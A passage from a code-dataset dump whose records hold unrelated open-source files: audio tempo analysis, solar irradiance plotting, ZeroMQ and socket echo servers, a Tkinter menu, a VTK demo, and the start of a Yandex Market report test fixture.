Hn[i][prev_Hni] += sumamp / float(count)\n sumamp = 0.0\n count = 1\n ### linear interpolate not-set bins\n if pprev_Hni - prev_Hni > 1:\n x0 = prev_Hni\n x1 = pprev_Hni\n y0 = Hn[i][prev_Hni]\n y1 = Hn[i][pprev_Hni]\n for k in xrange(prev_Hni+1, pprev_Hni):\n Hn[i][k] = y0 + (y1-y0)*(k-x0)/(x1-x0)\n #print x0, x1, y0, y1, Hn[i][pprev_Hni-1]\n pprev_Hni = prev_Hni\n prev_Hni = Hni\n #numpy.savetxt('bh.txt', Hn[0])\n\n #for a in range(0, 20):\n # numpy.savetxt(\"bh-combo-%i.txt\" % a, Hn[a])\n\n #if plot:\n # pylab.figure()\n # Hn_bpms = numpy.arange( 4*defs.BPM_MAX) / 4.0\n # pylab.plot(Hn_bpms, summed_beat_histograms)\n # pylab.title(\"Beat histogram\")\n\n ### time stretch, add\n harmonic_strengthened_bh = numpy.zeros( Hn.shape )\n for i in xrange( Hn.shape[0] ):\n ### unchecked direct translation of marsyas\n stretched = numpy.zeros( Hn.shape[1] )\n factor = 0.5\n numSamples = Hn.shape[1]\n for t in xrange( Hn.shape[1] ):\n ni = t*factor\n li = int(ni) % numSamples\n ri = li + 1\n w = ni - li\n if ri < numSamples:\n stretched[t] = Hn[i][li] + w * (Hn[i][ri] - Hn[i][li])\n else:\n stretched[t] = Hn[t]\n harmonic_strengthened_bh[i] = (\n Hn[i]\n #+ stretched\n )\n\n #numpy.savetxt(\"foo-%i.txt\" % i, harmonic_strengthened_bh[i])\n\n #for a in range(0, 20):\n # numpy.savetxt(\"bh-combo-%i.txt\" % a, harmonic_strengthened_bh[a])\n\n #if plot:\n # Hn_bpms = numpy.arange( 4*defs.BPM_MAX) / 4.0\n # pylab.plot(Hn_bpms, harmonic_strengthened_bh)\n\n ### pick top 8 candidates\n #peaks = []\n #for i in xrange( Hn.shape[0] ):\n # these_peaks = find_peaks(harmonic_strengthened_bh[i],\n # number=8, width=11)\n # peaks.append(these_peaks)\n\n #summed = numpy.sum(harmonic_strengthened_bh, axis=0)\n #summed = numpy.sum(Hn, axis=0)\n\n sHn = numpy.sum(Hn, axis=0)\n if plot:\n pylab.figure()\n sHn = numpy.sum(Hn, axis=0)\n pylab.plot(numpy.arange(len(sHn))/4.0, sHn)\n\n\n# folded_hist = numpy.zeros(60*4)\n# for i in xrange(1, len(summed)-1):\n# bpm = i/4.0\n# j = i\n# while bpm < 15:\n# bpm *= 2\n# j *= 2\n# while bpm > 30:\n# bpm /= 2.0\n# j /= 2.0\n# #j = int(round(j))\n# j = int(j)\n# #print \"%i\\tto\\t%i\" % (i, j)\n# if j >= len(folded_hist):\n# continue\n# folded_hist [j] += summed[i]\n#\n\n\n ### zzz confirmed up to here\n peaks = []\n for i in xrange( Hn.shape[0] ):\n these_peaks = find_peaks(harmonic_strengthened_bh[i],\n number=8, peak_neighbors=11)\n peaks.append(these_peaks / 4.0)\n #bpms = numpy.array(these_peaks)/4.0\n # numpy.savetxt(\"bh-peaks-%i.txt\" % i, bpms)\n\n cand_peaks = find_peaks(sHn,\n number=8, peak_neighbors=11) / 4.0\n #pylab.plot(numpy.arange(len(sHn))/4.0, sHn)\n pylab.show()\n #pylab.plot(cand_peaks)\n return cand_peaks\n\n #candidate_bpms = [ Hn_bpms[i] for i in peaks ]\n #print candidate_bpms\n #for p in peaks:\n # print numpy.array(p)/4\n #if plot:\n # pylab.figure()\n # pylab.plot(numpy.arange(30*4, 60*4)/4.0, folded_hist[30*4:])\n # pylab.show()\n return peaks[0], peaks\n\n","repo_name":"abramhindle/marsyas-fork","sub_path":"scripts/large-evaluators/tempo-reference-implementation/beat_histogram.py","file_name":"beat_histogram.py","file_ext":"py","file_size_in_byte":7672,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"4626406388","text":"#!/usr/bin/env python3\nfrom pvlib import location\nfrom pvlib import irradiance\nimport pandas as pd\nfrom matplotlib import pyplot as plt\n\n# For this example, we will be using Golden, Colorado\ntz = 'Hongkong'\nlat, lon = 22.4006261, 113.9700839\n\n# Create location object to store lat, lon, timezone\nsite = location.Location(lat, lon, tz=tz)\n\n\n# Calculate clear-sky GHI and transpose to plane of array\n# Define a function so that we can re-use the sequence of operations with\n# different locations\ndef get_irradiance(site_location, date, tilt, surface_azimuth):\n # Creates one day's worth of 10 min intervals\n times = pd.date_range(date, freq='10min', periods=6*24,\n tz=site_location.tz)\n # Generate clearsky data using the Ineichen model, which is the default\n # The get_clearsky method returns a dataframe with values for GHI, DNI,\n # and DHI\n clearsky = site_location.get_clearsky(times)\n # Get solar azimuth and zenith to pass to the transposition function\n solar_position = site_location.get_solarposition(times=times)\n # Use the get_total_irradiance function to transpose the GHI to POA\n POA_irradiance = irradiance.get_total_irradiance(\n surface_tilt=tilt,\n surface_azimuth=surface_azimuth,\n dni=clearsky['dni'],\n ghi=clearsky['ghi'],\n dhi=clearsky['dhi'],\n solar_zenith=solar_position['apparent_zenith'],\n solar_azimuth=solar_position['azimuth'])\n # Return DataFrame with only GHI and POA\n return pd.DataFrame({'GHI': clearsky['ghi'],\n 'POA': POA_irradiance['poa_global']})\n\n\n# Get irradiance data for summer and winter solstice, assuming 25 degree tilt\n# and a south facing array\nsummer_irradiance = get_irradiance(site, '06-21-2020', 10, 173)\nwinter_irradiance = get_irradiance(site, '06-21-2020', 15, 173)\n\n# Convert Dataframe Indexes to Hour:Minute format to make plotting easier\nsummer_irradiance.index = summer_irradiance.index.strftime(\"%H:%M\")\nwinter_irradiance.index = winter_irradiance.index.strftime(\"%H:%M\")\n\n# Plot GHI vs. POA for winter and summer\nfig, (ax1, ax2) = plt.subplots(1, 2, sharey=True)\nsummer_irradiance['GHI'].plot(ax=ax1, label='GHI')\nsummer_irradiance['POA'].plot(ax=ax1, label='POA')\nwinter_irradiance['GHI'].plot(ax=ax2, label='GHI')\nwinter_irradiance['POA'].plot(ax=ax2, label='POA')\nax1.set_xlabel('Time of day (Summer)')\nax2.set_xlabel('Time of day (Winter)')\nax1.set_ylabel('Irradiance ($W/m^2$)')\nax1.legend()\nax2.legend()\nplt.show()\nplt.savefig('foo.pdf')\n","repo_name":"kennethkwokop/solar-simulation","sub_path":"poa.py","file_name":"poa.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74553450471","text":"import zmq\nfrom zmq.utils.monitor import parse_monitor_message\n\nfrom events import EVENTS_MAP\n\n\ndef main() -> None:\n print(\"Start replier\")\n ctx = zmq.Context()\n sock = ctx.socket(zmq.REP)\n\n monitor = sock.get_monitor_socket()\n\n poller = zmq.Poller()\n poller.register(sock, zmq.POLLIN)\n poller.register(monitor, zmq.POLLIN)\n\n sock.bind(\"ipc://gandalf\")\n\n try:\n # event loop\n while True:\n # wait for either message or event\n polled = dict(poller.poll())\n\n # handle events\n if monitor in polled:\n try:\n while True:\n event_raw = monitor.recv_multipart(zmq.DONTWAIT)\n print(\"EVENT_RAW\", event_raw, flush=True)\n\n event = parse_monitor_message(event_raw)\n event_name = EVENTS_MAP[event['event']]\n print(\"EVENT\", event_name, event, flush=True)\n except zmq.ZMQError:\n print(\"NO EVENTS\", flush=True)\n\n # handle message\n if sock in polled:\n msg = sock.recv_string()\n print(\"SOCK_RECV\", msg, flush=True)\n print(\"REPL\")\n sock.send_string(f\"GOT {msg}\")\n\n print(\"----\\n\")\n\n except KeyboardInterrupt:\n print(\"\\nStop detected\")\n finally:\n print(\"Cleaning ...\")\n sock.disable_monitor()\n monitor.close(linger=0)\n sock.close(linger=0)\n\n print(\"Terminating context ...\")\n ctx.term()\n\n print(\"DONE\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"AndreiHondrari/techonologies-exploration","sub_path":"general-distributed-systems/zeromq/s20_01_monitor_socket/replier.py","file_name":"replier.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"72767095272","text":"from tkinter import *\r\nfrom tkinter.messagebox import *\r\n\r\n\r\nclass menuFrame:\r\n def __init__(self, window):\r\n self.menu = Menu()\r\n self.window = window\r\n self.name = '✔ Комментарии'\r\n self.gridName = '✔ Оси координат'\r\n self.settingMenu = None\r\n\r\n self.sp = ''\r\n\r\n def __makeDropDown(self, dictLabels):\r\n newItem = Menu(self.menu, tearoff=0)\r\n for item in dictLabels:\r\n newItem.add_command(label=item, command=dictLabels[item])\r\n return newItem\r\n\r\n def create(self, field, funcInput, funcLoad, funcClean, funcReturn):\r\n self.field = field\r\n\r\n self.settingMenu = Menu(self.menu, tearoff=0)\r\n\r\n submenu = Menu(self.settingMenu, tearoff=False)\r\n submenu.add_command(label=\"Функция\", command=field.changeColorNewPol)\r\n\r\n self.settingMenu.add_command(label=self.name, command=self.__showComment)\r\n self.settingMenu.add_command(label=self.gridName, command=self.__showGrid)\r\n self.settingMenu.add_cascade(label=\"Изменить цвет\", menu=submenu)\r\n\r\n self.menu.add_cascade(label='File', menu=self.__makeDropDown({\r\n 'Отменить ⏎': lambda: funcReturn(),\r\n 'Очистить 🗑': lambda: funcClean(field),\r\n }))\r\n self.menu.add_cascade(label='Setting', menu=self.settingMenu)\r\n self.menu.add_cascade(label='Info', menu=self.__makeDropDown({'Информация о программе': self.__info_programm,\r\n 'Информация об авторе': self.__info_author\r\n }))\r\n self.menu.add_cascade(label='Exit', menu=self.__makeDropDown({'Выход': self.window.destroy}))\r\n return self.menu\r\n\r\n def __showComment(self):\r\n self.field.radioShowComments()\r\n self.name = '✔ Комментарии' if self.name == '❌ Комментарии' else '❌ Комментарии'\r\n self.settingMenu.entryconfig(0, label=self.name)\r\n\r\n def __showGrid(self):\r\n self.field.canva.flagShowGrid(not self.field.canva.showArrows)\r\n self.gridName = '✔ Оси координат' if self.gridName == '❌ Оси координат' else '❌ Оси координат'\r\n self.settingMenu.entryconfig(1, label=self.gridName)\r\n\r\n\r\n def __info_author(self):\r\n showinfo('Info', 'Автор: Гурова Наталия ИУ7-44Б')\r\n\r\n def __info_programm(self):\r\n showinfo('Info', '\\nАлгоритм плавающего горизонта.\\n\\n'\r\n 'Краткая справка: чтобы получить новый рандомный цвет пригодится ctrl+N')","repo_name":"Tulenenok/BMSTU_CG","sub_path":"lab_10/view/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"ru","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"43951815065","text":"import socket\r\n\r\n\r\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\r\n s.bind((\"0.0.0.0\",1234))\r\n s.listen()\r\n c, addr = s.accept()\r\n with c:\r\n print(addr, \"connected\")\r\n\r\n while True:\r\n data = c.recv(1024)\r\n if not data:\r\n break\r\n c.sendall(data)","repo_name":"star-and-moon/this_is_my_dream","sub_path":"socket_user.py","file_name":"socket_user.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"9034173229","text":"#!/usr/bin/env python\nimport vtk\nfrom vtk.test import Testing\nfrom vtk.util.misc import vtkGetDataRoot\nVTK_DATA_ROOT = vtkGetDataRoot()\n\ntetraPoints = vtk.vtkPoints()\ntetraPoints.SetNumberOfPoints(4)\ntetraPoints.InsertPoint(0,0,0,0)\ntetraPoints.InsertPoint(1,1,0,0)\ntetraPoints.InsertPoint(2,.5,1,0)\ntetraPoints.InsertPoint(3,.5,.5,1)\naTetra = vtk.vtkTetra()\naTetra.GetPointIds().SetId(0,0)\naTetra.GetPointIds().SetId(1,1)\naTetra.GetPointIds().SetId(2,2)\naTetra.GetPointIds().SetId(3,3)\naTetraGrid = vtk.vtkUnstructuredGrid()\naTetraGrid.Allocate(1,1)\naTetraGrid.InsertNextCell(aTetra.GetCellType(),aTetra.GetPointIds())\naTetraGrid.SetPoints(tetraPoints)\nsub = vtk.vtkSubdivideTetra()\nsub.SetInputData(aTetraGrid)\nshrinker = vtk.vtkShrinkFilter()\nshrinker.SetInputConnection(sub.GetOutputPort())\nmapper = vtk.vtkDataSetMapper()\nmapper.SetInputConnection(shrinker.GetOutputPort())\nactor = vtk.vtkActor()\nactor.SetMapper(mapper)\nactor.GetProperty().SetColor(0.7400,0.9900,0.7900)\n# define graphics stuff\nren1 = vtk.vtkRenderer()\nrenWin = vtk.vtkRenderWindow()\nrenWin.AddRenderer(ren1)\niren = vtk.vtkRenderWindowInteractor()\niren.SetRenderWindow(renWin)\nren1.AddActor(actor)\nren1.SetBackground(0.1,0.2,0.4)\nrenWin.SetSize(300,300)\ncam1 = ren1.GetActiveCamera()\ncam1.SetClippingRange(0.183196,9.15979)\ncam1.SetFocalPoint(0.579471,0.462507,0.283392)\ncam1.SetPosition(-1.04453,0.345281,-0.556222)\ncam1.SetViewUp(0.197321,0.843578,-0.499441)\nren1.ResetCameraClippingRange()\nrenWin.Render()\n# render the image\n#\niren.Initialize()\n# --- end of script --\n","repo_name":"HopeFOAM/HopeFOAM","sub_path":"ThirdParty-0.1/ParaView-5.0.1/VTK/Filters/Modeling/Testing/Python/subDivideTetra.py","file_name":"subDivideTetra.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"72"} +{"seq_id":"184568099","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport runner # noqa\n\nfrom core.matcher import Wildcard, NoKey, Contains\nfrom core.types import (\n BookingAvailability,\n ClickType,\n CpaCategory,\n CpaCategoryType,\n Currency,\n DeliveryBucket,\n DeliveryOption,\n ExchangeRate,\n GpsCoord,\n HyperCategory,\n HyperCategoryType,\n MnPlace,\n Model,\n NewShopRating,\n Offer,\n Outlet,\n OutletDeliveryOption,\n Phone,\n PickupBucket,\n PickupOption,\n Region,\n Shop,\n UrlType,\n Vendor,\n VendorLogo,\n)\n\nfrom core.testcase import TestCase, main\nfrom core.datasync import DataSyncYandexUserAddress\nfrom core.report import DefaultFlags\nfrom collections import namedtuple\nfrom core.matcher import Absent\n\nSEARCH_FILTERS = '&mcpricefrom=100&mcpriceto=800&&offer-shipping=store&manufacturer_warranty=1&qrfrom=4&free_delivery=1&home_region_filter=225&delivery_interval=2&fesh=18001,18003,18004,18005&show-book-now-only=1&filter-discount-only=1' # noqa\n\nHOME_GPS_COORD = GpsCoord(37.40, 55.5)\nWORK_GPS_COORD = GpsCoord(37.35, 55.15)\nFAR_GPS_COORD = GpsCoord(17.17, 85.45)\nLOCATION_GPS_COORD = GpsCoord(37.15, 55.15)\n\n\nclass _Offers(object):\n store_offer = Offer(\n hyperid=55564,\n fesh=12320,\n title='store',\n pickup=False,\n price=10,\n waremd5='StoreOffer___________g',\n pickup_buckets=[9301],\n )\n\n pickup_offer = Offer(\n hyperid=55565,\n fesh=12320,\n title='pickup',\n price=100,\n store=False,\n waremd5='PickupOffer__________g',\n pickup_buckets=[9301],\n )\n\n post_term_offer = Offer(\n hyperid=55566,\n fesh=12320,\n title='post_term',\n price=1000,\n pickup=False,\n store=False,\n post_term_delivery=True,\n waremd5='PostTermOffer________g',\n pickup_buckets=[9302],\n )\n\n\nclass T(TestCase):\n @classmethod\n def prepare_basic(cls):\n # rids: [1, 100]\n # fesh: [101, 200]\n # outlet id: [201, 300]\n # hyperid: [301, 400]\n # hid: [401, 500]\n\n # RANDX randomizing is disabled because these tests don't work with it. See MARKETOUT-21319\n cls.disable_randx_randomize()\n\n cls.index.regiontree += [\n Region(rid=1, name='Город'),\n Region(rid=10, name='Страна', region_type=Region.COUNTRY),\n Region(rid=213, name='Москва для non-guru'),\n ]\n\n cls.index.shops += [\n Shop(fesh=101, priority_region=1, name='Shop1'),\n Shop(fesh=102, priority_region=1, name='Shop2'),\n Shop(fesh=103, priority_region=1, name='Shop3'),\n Shop(fesh=104, priority_region=1, name='Shop4', new_shop_rating=NewShopRating(new_rating_total=5.0)),\n Shop(\n fesh=105,\n priority_region=1,\n name='Shop5',\n new_shop_rating=NewShopRating(new_rating_total=3.0),\n home_region=10,\n ),\n Shop(fesh=106, priority_region=1, name='Shop6', delivery_service_outlets=[261, 262]),\n Shop(fesh=107, priority_region=1, name='Shop7', delivery_service_outlets=[261, 262]),\n # For testing postomat output on geo\n Shop(fesh=110, priority_region=1, name='Shop10', delivery_service_outlets=[400, 401]),\n Shop(fesh=111, priority_region=1, name='Shop11', delivery_service_outlets=[400, 401]),\n ]\n\n cls.index.outlets += [\n Outlet(point_id=211, fesh=101, region=1, gps_coord=GpsCoord(37.1, 55.1), point_type=Outlet.FOR_STORE),\n Outlet(point_id=212, fesh=101, region=1, gps_coord=GpsCoord(37.1, 55.3)),\n Outlet(point_id=213, fesh=101, region=1, gps_coord=GpsCoord(37.3, 55.3), point_type=Outlet.FOR_PICKUP),\n Outlet(point_id=214, fesh=101, region=1, gps_coord=GpsCoord(37.3, 55.1), point_type=Outlet.FOR_STORE),\n Outlet(point_id=215, fesh=101, region=1, gps_coord=GpsCoord(37.5, 55.5)),\n Outlet(point_id=216, fesh=101, region=1, gps_coord=GpsCoord(37.7, 55.7), point_type=Outlet.FOR_PICKUP),\n Outlet(point_id=221, fesh=102, region=1, gps_coord=GpsCoord(37.1, 55.5), point_type=Outlet.FOR_STORE),\n Outlet(point_id=222, fesh=102, region=1, gps_coord=GpsCoord(37.3, 55.5), point_type=Outlet.FOR_PICKUP),\n Outlet(point_id=223, fesh=102, region=1, gps_coord=GpsCoord(37.72, 55.72), point_type=Outlet.FOR_PICKUP),\n Outlet(point_id=231, fesh=103, region=1, gps_coord=GpsCoord(37.12, 55.12), point_type=Outlet.FOR_STORE),\n Outlet(point_id=232, fesh=103, region=1, gps_coord=GpsCoord(37.12, 55.32), point_type=Outlet.FOR_PICKUP),\n Outlet(point_id=233, fesh=103, region=1, gps_coord=GpsCoord(37.32, 55.32)),\n Outlet(point_id=241, fesh=104, region=1, gps_coord=GpsCoord(37.42, 55.42)),\n # Аутлеты для тестирования is-main и pickup-price\n Outlet(\n point_id=251,\n fesh=105,\n region=1,\n is_main=False,\n gps_coord=GpsCoord(55.3, 37.7),\n point_type=Outlet.FOR_PICKUP,\n phones=[\n Phone('+7-495-123-45-67*89'),\n Phone('+7-495-987-65-43*21'),\n Phone('+7 (812) 765-43-21'),\n Phone('+7 495 765-43-21'),\n Phone('+7 812 305 26 71'),\n Phone('+7 123 4561234'),\n Phone('8 (7655) 4-72110'),\n Phone('(495) 355-43-21'),\n Phone('355-43-21'),\n Phone('1-23-456'),\n Phone('987654'),\n ],\n delivery_option=OutletDeliveryOption(price=200),\n ),\n Outlet(\n point_id=252,\n fesh=105,\n region=1,\n is_main=False,\n gps_coord=GpsCoord(55.25, 37.7),\n point_type=Outlet.FOR_STORE,\n delivery_option=OutletDeliveryOption(price=100),\n ),\n Outlet(\n point_id=253,\n fesh=105,\n region=1,\n is_main=True,\n gps_coord=GpsCoord(55.5, 37.7),\n point_type=Outlet.FOR_PICKUP,\n delivery_option=OutletDeliveryOption(price=100),\n ),\n Outlet(\n point_id=254,\n fesh=105,\n region=1,\n is_main=True,\n gps_coord=GpsCoord(55.45, 37.7),\n point_type=Outlet.FOR_STORE,\n delivery_option=OutletDeliveryOption(price=200),\n ),\n # Постаматы\n Outlet(\n point_id=261,\n region=1,\n gps_coord=GpsCoord(37.12, 55.02),\n point_type=Outlet.FOR_POST_TERM,\n delivery_service_id=103,\n delivery_option=OutletDeliveryOption(price=150),\n ),\n Outlet(\n point_id=262,\n region=1,\n gps_coord=GpsCoord(37.3, 55.25),\n point_type=Outlet.FOR_POST_TERM,\n delivery_service_id=103,\n delivery_option=OutletDeliveryOption(price=150),\n ),\n # Это не постамат, для тестирования фильтрации постаматов от book_now\n Outlet(\n point_id=263,\n region=1,\n fesh=107,\n gps_coord=GpsCoord(37.4, 55.25),\n point_type=Outlet.FOR_STORE,\n delivery_option=OutletDeliveryOption(price=150),\n ),\n # For testing postomat output on geo\n Outlet(\n point_id=400,\n delivery_service_id=103,\n region=1,\n gps_coord=GpsCoord(55.45, 37.7),\n point_type=Outlet.FOR_POST_TERM,\n delivery_option=OutletDeliveryOption(price=200),\n ),\n Outlet(\n point_id=401,\n delivery_service_id=103,\n region=1,\n gps_coord=GpsCoord(55.46, 37.7),\n point_type=Outlet.FOR_POST_TERM,\n delivery_option=OutletDeliveryOption(price=200),\n ),\n Outlet(\n point_id=410,\n fesh=110,\n region=1,\n gps_coord=GpsCoord(55.46, 37.7),\n point_type=Outlet.FOR_PICKUP,\n delivery_option=OutletDeliveryOption(price=200),\n ),\n ]\n\n cls.index.pickup_buckets += [\n PickupBucket(\n bucket_id=5001,\n fesh=101,\n carriers=[99],\n options=[\n PickupOption(outlet_id=211),\n PickupOption(outlet_id=212),\n PickupOption(outlet_id=213),\n PickupOption(outlet_id=214),\n PickupOption(outlet_id=215),\n PickupOption(outlet_id=216),\n ],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=5002,\n fesh=102,\n carriers=[99],\n options=[PickupOption(outlet_id=221), PickupOption(outlet_id=222), PickupOption(outlet_id=223)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=5003,\n fesh=103,\n carriers=[99],\n options=[PickupOption(outlet_id=231), PickupOption(outlet_id=232), PickupOption(outlet_id=233)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=5004,\n fesh=104,\n carriers=[99],\n options=[PickupOption(outlet_id=241)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=5005,\n fesh=105,\n carriers=[99],\n options=[\n PickupOption(outlet_id=251, price=200),\n PickupOption(outlet_id=252, price=100),\n PickupOption(outlet_id=253, price=100),\n PickupOption(outlet_id=254, price=200),\n ],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=5006,\n carriers=[103],\n options=[PickupOption(outlet_id=261, price=150), PickupOption(outlet_id=262, price=150)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=5007,\n fesh=107,\n carriers=[99],\n options=[PickupOption(outlet_id=263, price=150)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=5008,\n carriers=[103],\n options=[PickupOption(outlet_id=401), PickupOption(outlet_id=401)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=5009,\n fesh=110,\n carriers=[99],\n options=[PickupOption(outlet_id=410)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n ]\n\n # Аутлеты на \"карте\"\n # Числа в скобках - координаты тайлов при zoom = 10\n # 37.0(617) 37.2(617) 37.4(618) 37.6(618) 37.8(619)\n # 55.8(321) |--------------|---------------|--------------|---------------\n # | | | | *(223)\n # | | | | *(216)\n # | | | |\n # | | | |\n # 55.6(322) |--------------|---------------|--------------|---------------\n # | | | |\n # | *(221) | *(222) | | *(253)\n # | | | *(215) | *(254)\n # | | |*(241) |\n # 55.4(323) |--------------|---------------|--------------|---------------\n # | | | |\n # | *(232) | *(233) | | *(251)\n # | *(212) | *(213) | | *(252)\n # | | *(262)PostTerm| |\n # 55.2(324) |--------------|---------------|--------------|---------------\n # | *We | | |\n # | *(231) | | |\n # | *(261)PostTe| *(214) | |\n # | *(211) | | |\n # 55.0(325) |--------------|---------------|--------------|---------------\n cls.index.vendors += [\n Vendor(\n vendor_id=401,\n name='samsung',\n website='www.samsung.com',\n webpage_recommended_shops='http://www.samsung.com/ru/brandshops/',\n description='VendorDescription',\n logos=[VendorLogo(url='//mdata.yandex.net/i?path=b0726220734_img_id5949902134120952009.png')],\n ),\n ]\n\n cls.index.hypertree += [HyperCategory(hid=504, output_type=HyperCategoryType.GURU)]\n\n cls.index.models += [\n Model(hyperid=301, title='Ноутбук с модификациями', hid=501, vendor_id=401),\n Model(hyperid=302, title='Телефон с модификациями', hid=502),\n Model(hyperid=303, title='Планшет с модификациями', hid=503),\n # For testing of postomat output on geo\n Model(hyperid=350, title='pepyaka-naturalnaya', hid=550),\n ]\n\n cls.index.offers += [\n Offer(\n fesh=101,\n title='good11',\n hyperid=301,\n price=100,\n bid=100,\n randx=100,\n booking_availabilities=[\n BookingAvailability(outlet_id=211, region_id=1, amount=5),\n BookingAvailability(outlet_id=212, region_id=1, amount=5),\n BookingAvailability(outlet_id=213, region_id=1, amount=5),\n BookingAvailability(outlet_id=214, region_id=1, amount=5),\n BookingAvailability(outlet_id=215, region_id=1, amount=5),\n BookingAvailability(outlet_id=216, region_id=1, amount=5),\n ],\n pickup_buckets=[5001],\n ),\n Offer(\n fesh=101,\n title='good12',\n hyperid=301,\n price=150,\n bid=150,\n randx=150,\n booking_availabilities=[\n BookingAvailability(outlet_id=211, region_id=1, amount=5),\n BookingAvailability(outlet_id=212, region_id=1, amount=5),\n BookingAvailability(outlet_id=213, region_id=1, amount=5),\n ],\n pickup_buckets=[5001],\n ),\n Offer(\n fesh=101,\n title='good13',\n hyperid=301,\n price=90,\n bid=150,\n randx=150,\n booking_availabilities=[\n BookingAvailability(outlet_id=211, region_id=1, amount=5),\n BookingAvailability(outlet_id=212, region_id=1, amount=5),\n ],\n pickup_buckets=[5001],\n ),\n Offer(fesh=101, title='good14', hyperid=301, price=80, bid=100, randx=90, pickup_buckets=[5001]),\n Offer(\n fesh=102,\n title='good21',\n hyperid=301,\n vendor_id=401,\n price=100,\n bid=250,\n cbid=250,\n randx=250,\n waremd5='2b0-iAnHLZST2Ekoq4xElr',\n booking_availabilities=[\n BookingAvailability(outlet_id=221, region_id=1, amount=5),\n BookingAvailability(outlet_id=222, region_id=1, amount=5),\n ],\n pickup_buckets=[5002],\n ),\n Offer(\n fesh=102,\n title='good21_vcluster',\n vclusterid=1000000007,\n price=100,\n bid=250,\n randx=250,\n waremd5='ppp-iAnHLZST2Ekoq4xElr',\n booking_availabilities=[\n BookingAvailability(outlet_id=221, region_id=1, amount=5),\n BookingAvailability(outlet_id=222, region_id=1, amount=5),\n ],\n pickup_buckets=[5002],\n ),\n Offer(fesh=102, title='good22', hyperid=301, price=90, bid=100, randx=90, pickup_buckets=[5002]),\n Offer(\n fesh=103,\n title='good31',\n hyperid=301,\n price=100,\n bid=50,\n randx=50,\n booking_availabilities=[\n BookingAvailability(outlet_id=231, region_id=1, amount=5),\n ],\n pickup_buckets=[5003],\n ),\n Offer(\n fesh=103,\n title='good32',\n hyperid=301,\n price=100,\n bid=40,\n randx=40,\n booking_availabilities=[\n BookingAvailability(outlet_id=231, region_id=1, amount=5),\n BookingAvailability(outlet_id=232, region_id=1, amount=5),\n BookingAvailability(outlet_id=233, region_id=1, amount=5),\n ],\n pickup_buckets=[5003],\n ),\n Offer(fesh=103, title='good33', hyperid=301, price=90, bid=30, randx=30, pickup_buckets=[5003]),\n Offer(fesh=104, title='good41', hyperid=301, price=90, bid=100, randx=90, pickup_buckets=[5004]),\n Offer(\n fesh=106,\n title='good_PostTerm_6',\n hyperid=301,\n price=90,\n bid=100,\n randx=90,\n post_term_delivery=True,\n pickup_buckets=[5006],\n ),\n Offer(\n fesh=107,\n title='Post_terminal_and_book_now_6',\n hyperid=701,\n price=90,\n bid=100,\n randx=90,\n post_term_delivery=True,\n booking_availabilities=[\n BookingAvailability(outlet_id=263, region_id=1, amount=5),\n ],\n pickup_buckets=[5007, 5006],\n ),\n Offer(\n fesh=105,\n title='good51',\n hyperid=302,\n price=90,\n bid=100,\n randx=90,\n booking_availabilities=[\n BookingAvailability(outlet_id=251, region_id=1, amount=5),\n BookingAvailability(outlet_id=252, region_id=1, amount=5),\n BookingAvailability(outlet_id=253, region_id=1, amount=5),\n BookingAvailability(outlet_id=254, region_id=1, amount=5),\n ],\n pickup_buckets=[5005],\n ),\n # Офферы для тестирования фильтров\n Offer(\n fesh=104,\n title='good52',\n hyperid=303,\n price=90,\n randx=90,\n manufacturer_warranty=True,\n has_delivery_options=False,\n available=True,\n pickup_buckets=[5004],\n ),\n Offer(\n fesh=105,\n title='good53',\n hyperid=303,\n price=90,\n randx=90,\n manufacturer_warranty=False,\n has_delivery_options=False,\n available=False,\n pickup_buckets=[5005],\n ),\n # For testing of postomat output on geo\n Offer(\n fesh=110,\n title='pepyaka-postomatish-1',\n price=1600,\n post_term_delivery=True,\n pickup_buckets=[5008, 5009],\n ),\n Offer(\n fesh=110,\n title='pepyaka-postomatish-2',\n price=1900,\n post_term_delivery=True,\n pickup_buckets=[5008, 5009],\n ),\n Offer(\n fesh=111,\n title='pepyaka-postomatish-3',\n price=1800,\n post_term_delivery=True,\n ),\n Offer(\n fesh=111,\n title='pepyaka-postomatish-4',\n price=1700,\n post_term_delivery=True,\n ),\n ]\n\n # Для тестирования групповой модели\n cls.index.models += [\n Model(hid=401, hyperid=311, group_hyperid=310),\n Model(hid=401, hyperid=312, group_hyperid=310),\n ]\n cls.index.offers += [\n Offer(fesh=104, hid=401, hyperid=310, pickup_buckets=[5004]),\n Offer(fesh=104, hid=401, hyperid=311, pickup_buckets=[5004]),\n Offer(fesh=104, hid=401, hyperid=312, pickup_buckets=[5004]),\n ]\n\n # Для тестирования offer-shipping\n for hyperid in range(1000, 1100):\n cls.index.models += [Model(hid=601, hyperid=hyperid)]\n\n cls.index.offers += [\n Offer(fesh=105, hid=601, hyperid=1100, pickup_buckets=[5005]),\n ]\n\n def test_geo_output_format(self):\n # Что тестируем: формат выдачи аутлета без применения 